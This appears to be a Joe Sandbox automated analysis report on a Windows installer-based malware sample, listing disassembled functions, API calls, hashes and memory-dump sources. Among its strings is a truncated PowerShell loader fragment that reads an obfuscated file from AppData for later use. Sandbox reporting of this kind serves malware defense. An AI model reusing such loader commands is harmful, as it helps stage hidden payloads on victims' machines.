                                                                  • Opcode ID: 714f38590da9a58201fff3fc134d9017d60c90884747fc52343908f3d48ea486
                                                                  • Instruction ID: 546e44f20ace30403b8508f380f469907ed62c60589eb312f7573fc2108540a6
                                                                  • Opcode Fuzzy Hash: 714f38590da9a58201fff3fc134d9017d60c90884747fc52343908f3d48ea486
                                                                  • Instruction Fuzzy Hash: A911A071910205EEDB14CFA1D6585AFB7B4EF44359F60843FE042B72D0D6B85A81DB1A
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                  • Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
                                                                  • Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                  • Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C
                                                                  APIs
                                                                    • Part of subcall function 00402C42: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteOpenValue
                                                                  • String ID:
                                                                  • API String ID: 849931509-0
                                                                  • Opcode ID: cdefdd5b013f918e554a2253c56164e98662eb930b786e2b832f38a56122c576
                                                                  • Instruction ID: adb3a0c882efced5b2b33e62a575662e5a0d3d88276fd09d1e11bfde7dcb239e
                                                                  • Opcode Fuzzy Hash: cdefdd5b013f918e554a2253c56164e98662eb930b786e2b832f38a56122c576
                                                                  • Instruction Fuzzy Hash: 64F04F72A00211ABEB00AFA59A8EAAE73689B54314F65443BF541B71C1D9BC5D014A2D
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000003,00402DA7,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00405A11
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,0040344F,?), ref: 00405A33
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                  • Instruction ID: 1eb9dddf645dfc1e42ea27fadde30db719d7f554b9b2fef872a17e27e5e15d7e
                                                                  • Opcode Fuzzy Hash: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                  • Instruction Fuzzy Hash: C0D09E71654601EFEF098F20DE16F6EBBA2EB84B00F11952DB692940E0DA7158199B15
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,?,004055ED,?,?,00000000,004057C3,?,?,?,?), ref: 004059ED
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405A01
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                  • Instruction ID: 105d3d0d857cc0cbbba7b98f67225fc33718dd0dc61d1976ebfe603fb8111b00
                                                                  • Opcode Fuzzy Hash: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                  • Instruction Fuzzy Hash: 7CD01272504421AFC2102728EF0C89BBF55DB543717028B35FDB5A22F0CB304C668E99
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                  • Instruction ID: 7cd01a958b5c1bc067bce53bc18bc5b829c77e753be975c6bca72629bb04cfa2
                                                                  • Opcode Fuzzy Hash: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                  • Instruction Fuzzy Hash: F7E04F76180108AFD700DFA4EE4AED977ECAB14704F004021B608E6091C674E5408B58
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031DB,00000000,00000000,00402FF3,000000FF,00000004,00000000,00000000,00000000), ref: 00405AA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                  • Instruction ID: 07b625fac44bf3ff9367e003840ea8544b808996ef6c51cee1fe321e6e9f2367
                                                                  • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                  • Instruction Fuzzy Hash: B1E08C3220125AEBEF11AE958C40AEB3B6CEB04360F004832FD10E3240D234E8218FE8
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404044
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                  • Instruction ID: bb65c4dcbe1315864773f47b2f89f2ce31b8fce6277c943a49bb9af31e43d00f
                                                                  • Opcode Fuzzy Hash: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                  • Instruction Fuzzy Hash: 84C09BB17407007BEA208F609D46F17775477B4702F1844397341F60D0C674D410DA1C
                                                                  APIs
                                                                  • SendMessageW.USER32(00000028,?,00000001,00403E47), ref: 00404029
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                  • Instruction ID: 691050d084ac05b3cc339cea154a0297f3c15b89657cbedd253a0759ece72884
                                                                  • Opcode Fuzzy Hash: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                  • Instruction Fuzzy Hash: 23B01236181A00BFDF114B10EE0AF857E62F7AC701F018438B340240F0CBF200A0DB08
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2E,?,?,?,?,00000000,0040344F,?), ref: 004031EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                  • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                  • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                  • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403DE0), ref: 00404012
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                  • Instruction ID: d41632a2b0a6fb41d9385d651c54052ae940fbff5a4ac867539882f0f930e1f3
                                                                  • Opcode Fuzzy Hash: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                  • Instruction Fuzzy Hash: 92A01132800200EFCE0A8B80EF0AC0ABB22BBA0300B008038A280800308A320830EB08
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004049DF
                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049EA
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A34
                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A47
                                                                  • SetWindowLongW.USER32(?,000000FC,00404FBF), ref: 00404A60
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A74
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A86
                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A9C
                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404AA8
                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404ABA
                                                                  • DeleteObject.GDI32(00000000), ref: 00404ABD
                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AE8
                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AF4
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B8A
                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404BB5
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BC9
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BF8
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404C06
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404C17
                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404D14
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D79
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D8E
                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404DB2
                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DD2
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404DE7
                                                                  • GlobalFree.KERNEL32(?), ref: 00404DF7
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E70
                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404F19
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F28
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F48
                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F96
                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404FA1
                                                                  • ShowWindow.USER32(00000000), ref: 00404FA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 1638840714-813528018
                                                                  • Opcode ID: fc100a1567586deb5399e3b3a8cb6ce54a25ad1339cc7449dce1ec81924229a7
                                                                  • Instruction ID: e53c56638097080d8a9576e5f9c25271d89cd91d9f9dd4264a0f886a8ea3ee34
                                                                  • Opcode Fuzzy Hash: fc100a1567586deb5399e3b3a8cb6ce54a25ad1339cc7449dce1ec81924229a7
                                                                  • Instruction Fuzzy Hash: CE028FB0900209EFEB109F54DD85AAE7BB5FB84315F10813AF611BA2E1C7B89D52DF58
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 004044D0
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004044FA
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004045AB
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004045B6
                                                                  • lstrcmpiW.KERNEL32(: Completed,0042D1F8,00000000,?,?), ref: 004045E8
                                                                  • lstrcatW.KERNEL32(?,: Completed), ref: 004045F4
                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404606
                                                                    • Part of subcall function 00405561: GetDlgItemTextW.USER32(?,?,00000400,0040463D), ref: 00405574
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 00406098
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,?,?,00000000), ref: 004060A7
                                                                    • Part of subcall function 00406035: CharNextW.USER32(?,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 004060AC
                                                                    • Part of subcall function 00406035: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 004060BF
                                                                  • GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 004046C7
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E2
                                                                  • SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404768
                                                                  Strings
                                                                  • : Completed, xrefs: 004045E2, 004045E7, 004045F2
                                                                  • "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$over, xrefs: 0040449A
                                                                  • C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe, xrefs: 004045D1
                                                                  • A, xrefs: 004045A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
